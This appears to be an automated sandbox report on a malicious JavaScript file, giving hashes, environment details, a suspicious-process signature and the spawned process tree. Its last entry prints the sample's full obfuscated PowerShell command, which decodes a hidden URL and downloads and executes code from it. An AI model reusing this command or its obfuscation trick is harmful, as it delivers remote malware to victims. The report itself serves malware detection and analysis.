Analysis
- max time kernel: 120s
- max time network: 123s
- platform: windows7_x64
- resource: win7-20231020-en
- resource tags: arch:x64, arch:x86, image:win7-20231020-en, locale:en-us, os:windows7-x64, system
- submitted: 31/10/2023, 20:21
Static task: static1
Behavioral task: behavioral1
- Sample: NQRX0468_5871143.js
- Resource: win7-20231020-en
Behavioral task: behavioral2
- Sample: NQRX0468_5871143.js
- Resource: win10v2004-20231020-en
General
- Target: NQRX0468_5871143.js
- Size: 270KB
- MD5: a2e2da4033a7080a9b5d3fa24d150a8e
- SHA1: 285433bc8135b46f468fb6d0c374c482b164e938
- SHA256: 968593a6e89a4498ec0a56643dde91dc2412a9e2344c0b97a79af38b1ef26727
- SHA512: 9fc5d4e8205042971e4c253346c5c3ae380db9baf6fd17ef3264ed79e2bdc70089b1efd1f3d99e50f1a24b9bba47d308e0a1b68cd81609165c337905675ef908
- SSDEEP: 1536:JNiN4YlrlHqsDNgJqQAXq8+8EYYZPPnvqgu0V2OkHKFl8OBlaGLsAX5dYiTlSQpP:uNbqsCQ9B5qqF7Wl8xap7Htn7
Malware Config
Signatures
- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  description: Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process
  pid: 2812
  pid_target: 2380
  Process: conhost.exe
  procid_target: 28
Processes
- C:\Windows\system32\wscript.exe
  wscript.exe C:\Users\Admin\AppData\Local\Temp\NQRX0468_5871143.js
  PID: 2888
- C:\Windows\system32\conhost.exe
  conhost --headless powershell $tqgxwnpsabil=(8708,8693,8710,8714,8711,8715,8694,8705,8639,8709,8704,8705,8640,8642,8639,8705,8697,8705,8656,8697,8690,8708,8697,8654);$dosvorv=('richard','net-secure','get-container', 'display-addin');foreach($rob9e in $tqgxwnpsabil){$awi=$rob9e;$mbpvydxqefcr=$mbpvydxqefcr+[char]($awi-8593);$vizit=$mbpvydxqefcr; $lira=$vizit};$jlcbwxstuopf[2]=$lira;$dmzkpt='rl';$five=1;new-alias zwert cu$dmzkpt;.$([char](9992-9887)+'ex')(zwert -useb $lira)
  Signature: Process spawned unexpected child process
  PID: 2812